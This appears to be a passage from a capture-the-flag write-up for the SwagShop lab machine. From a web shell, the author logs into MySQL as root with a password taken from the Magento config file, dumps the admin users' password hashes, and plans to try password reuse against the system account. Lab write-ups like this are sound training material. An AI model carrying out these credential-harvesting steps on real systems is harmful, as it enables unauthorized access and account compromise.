SwagShop_DB

DB

---

I’m getting the local DB data as I have a DB credential from the /app/etc/local.xml file

www-data@swagshop:/var/www/html$ mysql -uroot -pfMVWh7bDHpgZkyfqQXreTjU9

mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 10313
server version: 5.7.26-0ubuntu0.16.04.1 (Ubuntu)
 
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| swagshop           |
| sys                |
+--------------------+
5 rows in set (0.00 sec)
 
mysql> use swagshop;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
mysql> show tables;
+---------------------------------------------+
| Tables_in_swagshop                          |
+---------------------------------------------+
| admin_assert                                |
| admin_role                                  |
| admin_rule                                  |
| admin_user                                  |
| adminnotification_inbox                     |
| [...]                                       |
+---------------------------------------------+
335 rows in set (0.01 sec)
 
mysql> select user_id,firstname,lastname,username,password from admin_user;
+---------+-----------+----------+----------+-------------------------------------------------------------------+
| user_id | firstname | lastname | username | password                                                          |
+---------+-----------+----------+----------+-------------------------------------------------------------------+
|       1 | haris     | swagger  | haris    | 8512c803ecf70d315b7a43a1c8918522:lBHk0AOG0ux8Ac4tcM1sSb1iD5BNnRJp |
|       2 | firstname | lastname | fake     | 0a8335493c9fccd648ba53c601e3d67c:rp                               |
+---------+-----------+----------+----------+-------------------------------------------------------------------+
2 rows in set (0.00 sec)

I got the password hash for the haris user who is also the system user I might get lucky if there is password reuse